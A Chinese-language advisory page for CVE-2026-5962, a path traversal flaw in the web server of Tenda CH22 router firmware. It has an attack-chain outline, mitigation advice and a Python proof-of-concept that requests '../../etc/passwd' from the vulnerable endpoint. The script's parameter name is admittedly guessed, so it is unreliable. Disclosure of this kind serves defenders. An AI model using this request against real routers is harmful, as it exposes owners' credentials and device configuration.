CVE-2026-5962 CVSS 7.3 高危

CVE-2026-5962 Tenda CH22 路径遍历漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5962

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda CH22

漏洞概述

Tenda CH22路由器固件版本1.0.0.6(468)中的httpd组件存在路径遍历漏洞。该漏洞源于R7WebsSecurityHandlerfunction函数未能正确过滤用户输入，允许攻击者通过特制请求访问系统任意文件。由于无需身份认证且可远程利用，攻击者可借此获取敏感信息，威胁设备安全。官方已公开相关利用代码，用户需尽快采取措施。

技术细节

该漏洞的核心在于Tenda CH22路由器httpd服务中的R7WebsSecurityHandlerfunction函数存在逻辑缺陷。该函数旨在处理特定的Web安全请求，但在处理用户提供的文件路径参数时，未实施足够严格的边界检查和字符过滤。具体而言，攻击者可以利用序列如“../”或绝对路径来遍历目录结构。由于该漏洞位于网络层（AV:N）且不需要用户交互（UI:N）和身份认证（PR:N），攻击者可轻易地通过发送恶意构造的HTTP请求触发漏洞。一旦利用成功，攻击者能够绕过Web根目录限制，读取操作系统层面的任意文件，例如/etc/passwd或配置文件，从而获取设备敏感信息，对设备的机密性、完整性及可用性均造成影响。

攻击链分析

STEP 1

信息收集

攻击者扫描网络端口和服务，识别出运行Tenda CH22路由器且固件版本为1.0.0.6(468)的目标设备。

STEP 2

漏洞探测

攻击者向目标设备的httpd服务发送特制的HTTP请求，测试R7WebsSecurityHandlerfunction函数是否存在路径遍历过滤缺失。

STEP 3

漏洞利用

确认漏洞存在后，攻击者在请求参数中插入“../”等遍历序列，尝试读取系统敏感文件（如/etc/passwd或配置文件），获取凭据或系统信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target URL pointing to the vulnerable function
    url = f"http://{target_ip}/goform/R7WebsSecurityHandlerfunction"
    
    # Malicious payload attempting to traverse to /etc/passwd
    # The specific parameter name might vary based on reverse engineering
    params = {
        "file": "../../etc/passwd"
    }
    
    try:
        print(f"[*] Sending payload to {target_ip}...")
        response = requests.get(url, params=params, timeout=10)
        
        # Check for successful path traversal indicators
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful! Sensitive data leaked:")
            print(response.text)
        else:
            print("[-] Exploit failed or target not vulnerable.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Connection error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit(target)

影响范围

Tenda CH22 1.0.0.6(468)

防御指南

临时缓解措施

在无法立即升级固件的情况下，建议通过防火墙规则封锁外部对路由器Web管理界面的访问，并禁用远程管理功能。同时，管理员应密切监控设备日志，检查是否有异常的文件访问记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5962
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5962
3 Details https://www.cvedetails.com/cve/CVE-2026-5962/
4 VulDB https://vuldb.com/cve/CVE-2026-5962
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/CH22/vul_55/README.md
6 Link https://vuldb.com/submit/791277
7 Link https://vuldb.com/vuln/356515
8 Link https://vuldb.com/vuln/356515/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表